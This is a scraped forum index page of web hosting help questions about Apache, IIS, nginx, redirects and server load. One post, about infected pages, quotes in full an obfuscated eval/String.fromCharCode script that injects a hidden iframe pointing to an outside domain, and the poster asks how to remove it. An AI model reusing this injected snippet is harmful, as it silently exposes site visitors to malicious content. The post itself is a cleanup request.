IIS 5.1 Will Not Serve ASP Pages

Nov 14, 2008

I have a laptop which was recently reset to factory default and in the process I lost my ability to run and test my sites locally. So, I installed IIS (it is 5.1) and tested the default pages. So far I am having no luck getting anything but this:

-----------------------------
Server Application Error

The server has encountered an error while loading an application during the processing of your request. Please refer to the event log for more detail information. Please contact the server administrator for assistance.
-----------------------------

I have searched and searched and searched and I am just out of ideas on what to search for. So far, this is what I have tried: ......

View 6 Replies


ADVERTISEMENT

How Fast Does Your Site Serve Pages

Mar 31, 2009

Apache includes a handy little program called ab

You can use this to measure how long it takes a web site to deliver a page n times

I wonder if people would like to state how fast their sites using shared web hosting can deliver simple pages, one in HTML and one in PHP (people can add other scripting languages if they wish.

Please don't post the site name or host name, just the results; I'd be interested in seeing what the range of results is, without getting into debates about hosting sites.

Here are two web pages

hello.html:

<html>
<body>
<h1>Hello, world</h1>
</body>
</html>

hello.php:

<html>
<body>
<?php

echo "<h1>Hello, php world</h1>";

?>
</body>
</html>

Here are the test commands; note I set the concurrency level to 1 ("-c 1"), which gives a more realistic measure of the user response time for low-traffic sites.

html: ab -k -c 1 -n 50 [url]
php: ab -k -c 1 -n 50 [url]

And here are my results:

************** html:
Server Software: Apache/1.3.37
Concurrency Level: 1
Time taken for tests: 6.196 seconds

Requests per second: 8.07 [#/sec] (mean)
Time per request: 123.929 [ms] (mean)
Time per request: 123.929 [ms] (mean, across all concurrent requests)
Transfer rate: 3.36 [Kbytes/sec] received

************** php:

Server Software: Apache/1.3.37
Concurrency Level: 1
Time taken for tests: 15.859 seconds

Requests per second: 3.15 [#/sec] (mean)
Time per request: 317.190 [ms] (mean)
Time per request: 317.190 [ms] (mean, across all concurrent requests)
Transfer rate: 0.93 [Kbytes/sec] received

View 4 Replies View Related

Why Non-ssl Pages Are Blank, Ssl Pages Work

Feb 1, 2008

I am moving to a new server. At first the [url]version of the site was fine. I had trouble getting [url]working. Once I had the path to the certificate file correct, I was good to go. So, I started moving data. I also ran some updates on the new server (installed mysql, php, related pkgs). I don't know when the [url]pages stopped working, but I didn't realize it until I had everything moved over and tried to go live. The pages are completely blank. If I view source, I get this: ....

View 3 Replies View Related

Serve.com -- Anyone Has Experience

Dec 26, 2008

I have been working on a client's site that is hosted at www.serve.com. Anyone has an experience with them? I find them very lousy in support, support tickets take days to get response.. sometimes no response...

My task is to install drupal and customise it and .. but the clean-url feature doesnot work at their server .. as this conflicts with ther system settings. wow.

I am trying to find someone who has successfully installed Drupal with clean url enabled on their server.

View 7 Replies View Related

Apache :: Won't Serve Up CGI

Jan 25, 2013

I have installed Apache 2.0.64(Win32) and after repeated tries at adjusting the httpd.conf file, it still is refusing to serve up CGI. So far I have, following the Apache documentation, set my designated CGI directory with AddHandler directive, Option +ExecCGI enabled. Also have added the ScriptAlias directive as per instructions. These directives should work in conjuction with modules mod_alias and mod_cgi, both of which I have made sure were set to be loaded. The log files show no errors. There are no syntax errors being pushed out at start-up. The server stops and starts upon commands, with no problems,

I will post some excerpts from my httpd.conf in the pastebin as soon as it gets up & running--right now the authentication icon is missing.I have Active Perl 5.16 running on this machine, but my Apache download is the binary without SSL and with msi installer.

View 7 Replies View Related

Serve 1 000 000 Images From One Directory

Aug 13, 2008

I plan to build huge image gallery, using lighttpd to server these images. It would be easiest for me to have all these files (more than 1 000 000) in one directory? Is it ok?

I have no idea, if this can cause any problems. Should I part my files into several directories, does it make serving better/faster?

View 14 Replies View Related

Serve Images From A Different Location Based On IP

May 27, 2009

We have a major chunk of our traffic coming in from Asia and our servers are in the US. The latency is an issue which we have sorted out by ensuring we use Amazon's cloudfront CDN atleast for the static images.

Now while this is working rather well, we are now wanting to experiment and see if we could put up an additional image server in our country to serve IPs from that specific range.

In case the local image server goes down, the amazon cloudfront setup should be used. What are the best options for achieving this with the least amount of latency for the users?

View 8 Replies View Related

How Do Facebook, MySpace, Etc Serve So Many Users

Jan 24, 2008

when I type in www.facebook.com or www.myspace.com I'm taken to the main page but millions of people do the same thing every day.

I have basic understanding of DNS but only for single servers and small websites. I don't know how these organizations link of the necessary servers so that their website is available to all.

View 4 Replies View Related

Apache :: Unable To Serve More Requests

May 25, 2015

I have a little problem (on my Raspberry) with the maximum concurrent connections.When I open multiple tabs of a webpage which keeps persistent connections, apache is unable to serve more requests.Here is the (shortened) mod_info output (which also takes some time till there is a process kind enough to serve the request):

Code:
Server Version: Apache/2.4.10 (Raspbian) OpenSSL/1.0.1k
Server MPM: prefork
5 requests currently being processed, 9 idle workers

.___W____WWW_..W_...............................................
................................................................
......................

Srv PID Acc M CPU SS Req Conn Child Slot Client VHost Request

[Code] ....

When I understood it correctly, apache should spawn new processes (up to MaxRequestWorkers=150)

But there are idle???? processes, so it wont add new ones?

I dont think it has to do with mod_proxy (used for the webpage) since the mod_info output is affected as well...

View 1 Replies View Related

How To Password Protect Web Pages, I Can Protect Directories But Can't Put Pages In

Mar 4, 2007

i did make a big message on here but it deleted when i back spaced

my website is aviation cafe dot net / sample and i need you to help me with password protecting a webpage, i wanted the address to be / the silver sword and definitly not to look like it does now.

username: webforum
pass: password

View 4 Replies View Related

What Other Hosting Companies Serve The Same Niche As Alphared

Oct 14, 2008

namely, budget prices on servers. in particular unmetered bandwidth.

steadfast and hivelocity are the two I know of, but I'm wondering if I'm missing any.

View 8 Replies View Related

Apache :: Serve Domain Subfolder From 2 Different Server

Aug 31, 2013

I need to serve domain subfolder from different Apache 2 server.

1. Squid 3 reverse proxy is pointin to 80.241.222.151 for domain [URL] ....
2. Apache 2 server is on 80.241.222.151 with all files in the root folder so all requests are served from here
3. Now im creating new server at 80.241.222.149 with all files from [URL] ... transferred to the root
4. On Squid 3 server [URL] .... is still pointing to 80.241.222.151
5. But now i need to call [URL] .... from 80.241.222.149 in the root.

What is the example to do this? mod_proxy on Apache 2 server at 80.241.222.151?

View 1 Replies View Related

AddType In HTAccess Causes Apache To Serve Bad URLs

Nov 15, 2013

My website is on 1and1 shared hosting and to enable PHP I needed to put in my .htaccess the following

AddType x-mapp-php5 .php .html .htm .shtml

View 11 Replies View Related

Windows Serve Runable To Send Mail To Outside Email

Mar 5, 2008

I have a Windows server + Helm 4 + smartermail 4.

I found that my server today all users web scripts suddenly cannot send the contact form mails, membership registration mails to outside user. (all acripts code by asp.net)

I try to use many form mail scripts, all als

View 1 Replies View Related

Apache :: Serve XML File As Response For Appropriate Request When Web Service Is Down

May 30, 2013

I am using the latest version of Apache on an Windows XP machine

When my web service is down for maintenance, since Apache is will still be up and running, I would like for Apache to serve an xml file as a response for the appropriate request. I have three operations available, makePayment, calculateFee, and voidPayment.

Is it possible to have Apache determine what type of request is made for example if I have an xml error page for each operation; how will Apache know which xml file to serve based on the operation request from the client

To make it more clear: What is the best practice for modifying apache to know what request is being made in order to serve the appropriate xml file?

View 1 Replies View Related

Ngix To Serve Static File Contents On CPanel Servers

Jun 17, 2009

how to setup Nginx webserver on a cpanel server to serve static contents,
say /images folder from every domains hosted on the server so that Apache's load will decrease?

View 12 Replies View Related

Apache :: Server Ran Out Of Threads To Serve Requests - ThreadsPerChild Settings

Mar 27, 2013

I'm running Apache 2.4.4 on Windows Server 2008 R2. It's already happened many times that Apache stopped responding to requests. The last entry in the error.log:

[Wed Mar 27 06:22:07.043600 2013] [mpm_winnt:notice] [pid 1736:tid 256] AH00354: Child: Starting 64 worker threads.
[Wed Mar 27 06:52:34.521200 2013] [mpm_winnt:error] [pid 1736:tid 1656] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting

View 1 Replies View Related

Plesk 12.x / Linux :: Making Subdomain Serve Files From Same Directory As Main Domain

Sep 28, 2014

I'm setting up a SAAS service which is built on top of Laravel. To put it simply the service itself knows whether its being called from a sub.example.com or just example.com and serves a correct response accordingly. So going to sub.example.com will use the same index.php file as example.com but the routes and controllers within the application will provide a different response. sub.example.com will show a tenant login page where as example.com will show a new tenant subscription page or something else.

So when someone new subscribes I add a new entry to the database with a subdomain name for them and when a request comes from that subdomain and they are logged in it will show them their information. Easy right.

There is a problem though with setting it up with Plesk. When I add a wildcard subdomain, it will look for /subdomains/sub/ for the files which is a bit problematic since I want it to serve the files from the same place as the domain example.com.

Is there a way to configure that so that regardless of the subdomain it will try and serve the exact same content as my main domain?

View 2 Replies View Related

Mirror/Mirroring Site Hosting/aka: Impressed At Ability Of Cheap Hardware To Serve Static HTML

Nov 5, 2009

We recently began to mirror a large number of open source projects with a dedicated mirror server on our network and I was surprised not only with how popular the mirror server has become, is, but also of the ability of the hardware we're using to keep up with the load.

At an given time, the mirror seems to be pushing at least 50 Megabits of trafficthe server is also an IRC server (irc.igsobe.com) for customers and internal staff communications.

The hardware is a low end Dell Pentium 4 @ 2.66 GHZ server, running with 512MB of RAM and a 400 GB ATA hard drive. CentOS v5.3 is the operating system.

If you're interested, you can view the HTML logfile analysis here but that doesn't tell the full story as FTP users make up a good portion of the traffic. We've received over a quarter million hits in the first few days of November alone.

18:14:15 up 65 days, 9:04, 5 users, load average: 0.31, 0.69, 0.56

The only change that I made to the default configuration was lowering the maximum number of Apache servers to 128.

Just thought I'd share this information as I wouldn't have thought a server with such a small amount of RAM would be able to serve up so much data, even though we are talking strictly static HTML files.

I'll definitely keep this in mind when clients ask me for those "what type of dedicated server should I use for XXX" type discussions that are had all too often with clients.

View 0 Replies View Related

WHM 404 Pages

May 28, 2008

one minute i login to WHM and it's fine...the next I get a 404 error

View 3 Replies View Related

Infected Web Pages

Jun 10, 2009

150 php pages infected codes like.... As we do not have a backup..is there any commands to remove it

<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,11 8,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61 ,34,105,10 2,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115, 114,39,43, 39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32 ,119,105,1 00,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,1 17,110,99, 116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51 ,48,52,49, 56,50,52))</script>

Is there any command to search and replace this whole string from files...normal sed is not seems to be working with these symbols.

View 8 Replies View Related

Can't View Man Pages

May 16, 2009

I can't get any man pages. For some reason when I try to use it, I continue to get this error:

Code:
XXX
XXX WARNING: old character encoding and/or character set
XXX

View 2 Replies View Related

302 Pages And Such Things

Oct 26, 2009

I'm not sure if this is correct place to post this, but I had a look round and couldn't see anything particularly appropriate.

Can someone point me in the right direction... give me a link or some advice... I want to learn about 302 pages, 301 pages and other types of pages.

I read that 302 pages may mean a website's traffic is being redirected by someone else...?

Obviously, I want to know if someone is sneakily redirecting my traffic... and I need to protect myself against it.

View 4 Replies View Related

How To Place Ads At Top Of All Pages

May 22, 2008

I want to provide hosting with ads at the top of all pages but I don't want to deal with those "free hosting" scripts. I can set up the accounts manually, as it's a small and focused group I would be providing it to. I understand there is a simple way to place ads at the top of all the web pages on the server. Anyone know about this, can clue me in on how it's done?

I'm running CentOS with cPanel/WHM.

View 3 Replies View Related

Phish Pages

Oct 30, 2008

I have these few old accounts(websites) that has history of being phish attacked. The problem is like this. When I transfer them to newer server using whm backup transfer in most cases hacker can still upload phish pages BUT if I recreate the account and moved old the files manually to that new account and server phish attacked is gone. Any idea why this is happening? Probably old cpanel files that causes this? where do I start? For some reasons I cannot just recreate the account then do it manually in behalf of the clients. Some sites are somehow complicated if I do it manually.

View 0 Replies View Related

Pages Back Up

Feb 24, 2008

I just recently changed the server my website was being hosted on (my website being a small hosting-biz) and my site has been replaced by 1and1's temporary landing page. The thing is I have no idea or experience on what to do to put my pages back up. I don't even think I have them saved anywhere...

View 10 Replies View Related

301 Redirect Of Many Pages On IIS

Aug 7, 2008

We have a situation where we want to rename about 550 HTML pages. In doing so, we want to 301 redirect the old pages to the new ones - best choice I believe?

All:
What is the easiest way to do this? We are running Microsoft IIS. I don't want to burden the system admin (not me) with having to a manual operation on 500 + pages. Also, the page names will be completely different. Besides going from html to .asp the names will totally be changed from like abcd123.html to my-optimized-keywords.asp

Has anyone used a custom 404 page to handle this. How does it work?

View 0 Replies View Related

Hosting ASP Pages

Jan 30, 2007

ive 2mb broadband connection and i want to host a few pages made in ASP.

My OS is windows 2000 server.Webserver is IIS.

Dont want to register a domain just want to do it through IP.

Ive also purchased a static IP from my Internet service provider.

Is it possible? if it is can anyone give me link to any good tutorial by which it can be done?

View 4 Replies View Related

HostGator Ads In My Error Pages?

Aug 22, 2008

I just got an account with HostGator and when I typed in part of my site's URL wrong it went to some kinda shady looking HostGator spam site.

There's some message that says something about money from their ads going to charity. Does anybody know if they actually donate the money to charity and if so which charity?

Even if the money does go to charity, I think it is extremely unprofessional of them to override the error pages that I uploaded with my site.

View 14 Replies View Related

Linking Pages With Different Hosts

Jan 28, 2009

If the user links to a different page and domain hosted by the same company is the browser experience quicker? If I have 2 webpages with 2 different hosts and wish to link them is there any meaningful slowdown for the user, to transfer to different pages with different hosts.

Do all the pages of a domain need to be hosted from the one host?

View 10 Replies View Related

SSL With Links In Https Pages...

Jun 18, 2009

I have an SSL cert installed to have a secure commerce area. Some of the pages have external links to non-secure sites like say [url]The padlock icon breaks and warns that there's unauthorized content. The hosting provider says it's because the external links need to be https links. Obviously that can't be done to a non-secure external site.

So the question is: do external http links break security on a secure https page? If so, is there a work around other than removing external links?

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved